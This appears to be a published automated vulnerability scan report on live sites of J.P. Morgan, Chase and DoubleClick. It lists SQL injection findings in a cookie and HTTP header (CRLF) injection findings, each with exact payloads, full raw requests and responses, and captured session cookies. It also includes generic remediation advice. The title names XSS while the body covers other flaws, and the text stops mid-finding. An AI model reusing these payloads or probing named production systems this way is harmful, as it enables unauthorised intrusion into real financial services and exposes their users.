XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 07122011-01

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.

1.1. http://www.jpmorgan.com/pages/jpmorgan/investbk/solutions/fixedincome/fx [ARPT cookie] next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.jpmorgan.com
Path:	/pages/jpmorgan/investbk/solutions/fixedincome/fx

Issue detail

The ARPT cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the ARPT cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /pages/jpmorgan/investbk/solutions/fixedincome/fx?source=megamenu HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO'%20and%201%3d1--%20; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405

Response 1

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:30:02 GMT
Cache-Control: no-cache="set-cookie"
Content-Type: text/html; charset=UTF-8
host_service: FutureTenseContentServer:6.3.0
X-Powered-By: Servlet/2.4 JSP/2.0
Set-Cookie: ARPT=NKOJWQS188.21-cws7214CKJKQ; path=/
Set-Cookie: JpmcSession=Vpm1TcyhnGmWvLxjgChCvgjSjfDWtgbgfVg418dLhGwKyLRfT7S2!1696421816; path=/
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 61889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">








<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

   <title>Foreign Exchange | J.P. Morgan</title>

   <META NAME="jpmc_lob" CONTENT="Investment Bank" />

   <META NAME="keywords" CONTENT="fx, foreign exchange, currency, morgan direct" />

<meta name="google-site-verification" content="yHbvL6U-Rd7KWvEPHU2xqanjwmr9JqCEKUFACv7pz78" />

<script type="text/javascript">

   var _gaq = _gaq || [];
   _gaq.push(['_setAccount', 'UA-20028469-1']);
   _gaq.push(['_trackPageview']);

   (function() {
       var ga = document.createElement('script'); ga.type = 'text' + '/' + 'javascript'; ga.async = true;
       ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com' + '/' + 'ga.js';
       var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
   })();

</script>


       <META NAME="ROBOTS" CONTENT="index,follow,NOODP">
       <META NAME="GOOGLEBOT" CONTENT="NOODP">


<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1153920691238&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_Template' type="text/css" />
<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1153920691266&pagena
...[SNIP]...

Request 2

GET /pages/jpmorgan/investbk/solutions/fixedincome/fx?source=megamenu HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO'%20and%201%3d2--%20; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405

Response 2

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:30:03 GMT
Content-Type: text/html; charset=UTF-8
host_service: FutureTenseContentServer:6.3.0
X-Powered-By: Servlet/2.4 JSP/2.0
Set-Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; path=/
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 61889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">








<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

   <title>Foreign Exchange | J.P. Morgan</title>

   <META NAME="jpmc_lob" CONTENT="Investment Bank" />

   <META NAME="keywords" CONTENT="fx, foreign exchange, currency, morgan direct" />

<meta name="google-site-verification" content="yHbvL6U-Rd7KWvEPHU2xqanjwmr9JqCEKUFACv7pz78" />

<script type="text/javascript">

   var _gaq = _gaq || [];
   _gaq.push(['_setAccount', 'UA-20028469-1']);
   _gaq.push(['_trackPageview']);

   (function() {
       var ga = document.createElement('script'); ga.type = 'text' + '/' + 'javascript'; ga.async = true;
       ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com' + '/' + 'ga.js';
       var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
   })();

</script>


       <META NAME="ROBOTS" CONTENT="index,follow,NOODP">
       <META NAME="GOOGLEBOT" CONTENT="NOODP">


<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1153920691238&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_Template' type="text/css" />
<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1153920691266&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_Template' type="text/css" />
<link rel="stylesheet" media="screen" href='/cm/Satellite?
...[SNIP]...

1.2. http://www.jpmorgan.com/tss/General/ACH_Fraud_Solutions/1159383343594 [ARPT cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.jpmorgan.com
Path:	/tss/General/ACH_Fraud_Solutions/1159383343594

Issue detail

The ARPT cookie appears to be vulnerable to SQL injection attacks. The payloads 12195430'%20or%201%3d1--%20 and 12195430'%20or%201%3d2--%20 were each submitted in the ARPT cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /tss/General/ACH_Fraud_Solutions/1159383343594 HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/tss/General/Payment_Fraud_Prevention/1159339812702
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO12195430'%20or%201%3d1--%20; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; s_cc=true; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.5.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405; s_sq=jpmcglobal%2Cjpmorgan%2Cjpmorgantss%2Cjpmorgancash%3D%2526pid%253DGeneral%25253A%252520Security%252520Center%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/tss/General/ACH_Fraud_Solutions/1159383343594%2526ot%253DA%26jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DAsset%252520Management%252520-%252520UK%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/am/uk/press_office%2526ot%253DA

Response 1

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:33:52 GMT
Cache-Control: no-cache="set-cookie"
Content-Type: text/html; charset=UTF-8
HOST_SERVICE: FutureTenseContentServer:6.3.0
X-Powered-By: Servlet/2.4 JSP/2.0
Set-Cookie: ARPT=NKOJWQS155.180.188.20CKOML; path=/
Set-Cookie: JpmcSession=ZWHvTcpQ0K8mgj7Wrpm6YpZPYh214QkpT1Kdq8zHDkfGXngqWGHw!-779951483; path=/
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 104714




































































<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html;CHARSET=iso-8859-1" />


   <META name="jpmc_lob" content="Treasury Services">

<TITLE>J.P. Morgan | ACH Fraud Solutions</TITLE>

<META NAME="robots" CONTENT="INDEX,FOLLOW"/>

<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1226851232932&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_Template' type="text/css" />
<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1226851232960&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_Template' type="text/css" />
<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1226851232974&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_Template' type="text/css" />
<l
...[SNIP]...

Request 2

GET /tss/General/ACH_Fraud_Solutions/1159383343594 HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/tss/General/Payment_Fraud_Prevention/1159339812702
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO12195430'%20or%201%3d2--%20; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; s_cc=true; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.5.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405; s_sq=jpmcglobal%2Cjpmorgan%2Cjpmorgantss%2Cjpmorgancash%3D%2526pid%253DGeneral%25253A%252520Security%252520Center%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/tss/General/ACH_Fraud_Solutions/1159383343594%2526ot%253DA%26jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DAsset%252520Management%252520-%252520UK%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/am/uk/press_office%2526ot%253DA

Response 2

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:56:00 GMT
Date: Tue, 12 Jul 2011 15:33:57 GMT
Content-Type: text/html; charset=UTF-8
HOST_SERVICE: FutureTenseContentServer:6.3.0
X-Powered-By: Servlet/2.4 JSP/2.0
Set-Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; path=/
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 104714




































































<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html;CHARSET=iso-8859-1" />


   <META name="jpmc_lob" content="Treasury Services">

<TITLE>J.P. Morgan | ACH Fraud Solutions</TITLE>

<META NAME="robots" CONTENT="INDEX,FOLLOW"/>

<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1226851232932&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_Template' type="text/css" />
<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1226851232960&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_Template' type="text/css" />
<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1226851232974&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_Template' type="text/css" />
<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1226851232946&pagename=JPM_redesign%2FJPM_Stylesheet_C%2
...[SNIP]...

1.3. http://www.jpmorgan.com/tss/Product_A-Z/Products_and_Solutions/1104848729254 [ARPT cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.jpmorgan.com
Path:	/tss/Product_A-Z/Products_and_Solutions/1104848729254

Issue detail

The ARPT cookie appears to be vulnerable to SQL injection attacks. The payloads 84051685'%20or%201%3d1--%20 and 84051685'%20or%201%3d2--%20 were each submitted in the ARPT cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /tss/Product_A-Z/Products_and_Solutions/1104848729254 HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/tss/General/Payment_Fraud_Prevention/1159339812702
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO84051685'%20or%201%3d1--%20; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; s_cc=true; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.5.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405; s_sq=jpmcglobal%2Cjpmorgan%2Cjpmorgantss%2Cjpmorgancash%3D%2526pid%253DGeneral%25253A%252520Security%252520Center%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/tss/Product_A-Z/Products_and_Solutions/1104848729254%2526ot%253DA%26jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DAsset%252520Management%252520-%252520UK%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/am/uk/press_office%2526ot%253DA

Response 1

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:33:40 GMT
Cache-Control: no-cache="set-cookie"
Content-Type: text/html; charset=UTF-8
HOST_SERVICE: FutureTenseContentServer:6.3.0
X-Powered-By: Servlet/2.4 JSP/2.0
Set-Cookie: ARPT=NKOJWQS155.180.188.20CKOML; path=/
Set-Cookie: JpmcSession=CyQnTcpJpNkFpTTFdcJqwczNxhlLDYQhV8h2vn0tTfgv5pQvqwTr!-779951483; path=/
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 106611

















<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html;CHARSET=iso-8859-1" />


   <META name="jpmc_lob" content="Treasury Services">

<TITLE>J.P. Morgan | Treasury Services Product A-Z Index</TITLE>

<META NAME="robots" CONTENT="INDEX,FOLLOW"/>

<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1226851232932&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_Template' type="text/css" />
<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1226851232960&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_Template' type="text/css" />
<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1226851232974&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_Template' type="text/css" />
<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1226851232946&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_
...[SNIP]...

Request 2

GET /tss/Product_A-Z/Products_and_Solutions/1104848729254 HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/tss/General/Payment_Fraud_Prevention/1159339812702
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO84051685'%20or%201%3d2--%20; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; s_cc=true; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.5.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405; s_sq=jpmcglobal%2Cjpmorgan%2Cjpmorgantss%2Cjpmorgancash%3D%2526pid%253DGeneral%25253A%252520Security%252520Center%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/tss/Product_A-Z/Products_and_Solutions/1104848729254%2526ot%253DA%26jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DAsset%252520Management%252520-%252520UK%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/am/uk/press_office%2526ot%253DA

Response 2

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:33:43 GMT
Content-Type: text/html; charset=UTF-8
HOST_SERVICE: FutureTenseContentServer:6.3.0
X-Powered-By: Servlet/2.4 JSP/2.0
Set-Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; path=/
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 106611

















<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html;CHARSET=iso-8859-1" />


   <META name="jpmc_lob" content="Treasury Services">

<TITLE>J.P. Morgan | Treasury Services Product A-Z Index</TITLE>

<META NAME="robots" CONTENT="INDEX,FOLLOW"/>

<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1226851232932&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_Template' type="text/css" />
<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1226851232960&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_Template' type="text/css" />
<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1226851232974&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_Template' type="text/css" />
<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1226851232946&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_Template' type="text/css" />
<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1226851232988&pagename=JP
...[SNIP]...

2. HTTP header injection previous next
There are 5 instances of this issue:

http://ad.doubleclick.net/getcamphist [REST URL parameter 1]
http://ad.doubleclick.net/getcamphist [src parameter]
https://locator.chase.com/LocatorAction.do [REST URL parameter 1]
https://locator.chase.com/favicon.ico [REST URL parameter 1]
https://locator.chase.com/jsp/SearchPage.jsp [REST URL parameter 1]

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

2.1. http://ad.doubleclick.net/getcamphist [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/getcamphist

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8ca46%0d%0aae875a6483a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8ca46%0d%0aae875a6483a;src=1513429;host=metrics.apple.com%2Fb%2Fss%2Fappleglobal%2Cappleitunes%2Cappleusitunesipod%2F1%2FH.22.1%2Fs11845888246316%3FAQB%3D1%26vvpr%3Dtrue%26%26ndh%3D1%26t%3D12%252F6%252F2011%252012%253A59%253A8%25202%2520300%26pageName%3Ditunes%2520-%2520index%2520%28us%29%26g%3Dhttp%253A%252F%252Fwww.apple.com%252Fitunes%252F%26cc%3DUSD%26vvp%3DDFA%25231513429%253Av46%253D%255B%255B%2522DFA-%2522%252Blis%252B%2522-%2522%252Blip%252B%2522-%2522%252Blastimp%252B%2522-%2522%252Blastimptime%252B%2522-%2522%252Blcs%252B%2522-%2522%252Blcp%252B%2522-%2522%252Blastclk%252B%2522-%2522%252Blastclktime%255D%255D%26ch%3Dwww.us.itunes%26c1%3Dmusic%2520-%2520sep%25202010%2520%28us%29%26c4%3Dhttp%253A%252F%252Fwww.apple.com%252Fitunes%252F%26c5%3Dwin32%26c6%3DD%253D%2522%253A%2520%2522%252BpageName%26c9%3Dwindows%26c12%3Dno%2520itunes%26c15%3Dno%2520zip%26c18%3Dno%2520quicktime%26c19%3Dflash%252010%26c20%3Dnon-store%2520kiosk%26c25%3Dother%2520nav%2520or%2520none%26c44%3Dappleglobal%252Cappleitunes%252Cappleusitunesipod%26c48%3D1%26c49%3DD%253Ds_vi%26c50%3Ditunes%253D3%26s%3D1920x1200%26c%3D32%26j%3D1.6%26v%3DY%26k%3DY%26bw%3D1065%26bh%3D823%26p%3DShockwave%2520Flash%253BJava%2520Deployment%2520Toolkit%25206.0.260.3%253BJava%28TM%29%2520Platform%2520SE%25206%2520U26%253BChrome%2520PDF%2520Viewer%253BGoogle%2520Gears%25200.5.33.0%253BWPI%2520Detector%25201.3%253BGoogle%2520Update%253BDefault%2520Plug-in%253B%26AQE%3D1&A2S=1;ord=22175180 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.apple.com/itunes/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8ca46
ae875a6483a;src=1513429;host=metrics.apple.com/b/ss/appleglobal,appleitunes,appleusitunesipod/1/H.22.1/s11845888246316:
Date: Tue, 12 Jul 2011 17:59:33 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.2. http://ad.doubleclick.net/getcamphist [src parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/getcamphist

Issue detail

The value of the src request parameter is copied into the Location response header. The payload d4dd7%0d%0a1d25cb0b3ad was submitted in the src parameter. This caused a response containing an injected HTTP header.

Request

